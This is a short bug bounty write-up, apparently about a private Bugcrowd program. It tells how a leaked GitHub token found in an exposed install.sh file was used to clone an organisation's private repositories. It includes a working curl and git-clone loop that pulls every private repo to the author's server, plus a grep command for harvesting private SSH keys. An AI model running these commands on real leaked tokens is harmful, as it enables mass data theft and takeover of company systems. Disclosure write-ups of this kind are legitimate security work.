Full structure takeover to many brands of company
Notic: this private program is hosted on bugcrowd platform and have many brands
While testing this program I made a brute-force directories and found this directory listing http://sub.target.com/scripts
While analysing this files I have found interested token in [install.sh] file
This is Github access token, [d42e9078e94930************] , but first I want to verify this token valid or expired , because when developer create this token can choose time to expired it automatically like this ..
Lets try to verify
You should request like this URL by browser or curl, and then matches the response repositories or it was expired ..
Amazing!! I can list private clone repositories, But I can’t report it without make sure that data related to company or not, because maybe this developer just work part-time in company, so I will clone private repositories and analysis it, lets goo
curl https://api.github.com/orgs/<username>/repos?access_token=<token> | grep '\"name\"' | cut -d ":" -f 2 | cut -d '"' -f 2 > privare_repos_name.txtfor repo in $(cat privare_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done
This bash code to clone all private repositories at my VPS and then go to analysis it
I have found 5.4G size of repositories OMG..
I can’t analysis this size of data in short time, so I will use grep command to get sensitive data
# Grep private ssh key command
grep -r -R '(?=[-]*(?=[A-Z]*(?=[-])))(.*)(?=[-]*(?=[A-Z]*(?=[-])))'
This regex to extract private ssh key from all repositories , very nice
This file I have found many of creds and I have found many of docker connections but I cant make this because its out of scope from program, because the program say that not to try connect databases or internal structure
But I have larger than 15 private repository related to 15 brand :)
I found at every repo [ panel passwords , backup databases , full application code , cloud creds] and I can connect and takeover all brands
Also Business impact
I reached to all [product architecture , products layout] but sorry I cant share this, to preserve the confidentiality of company data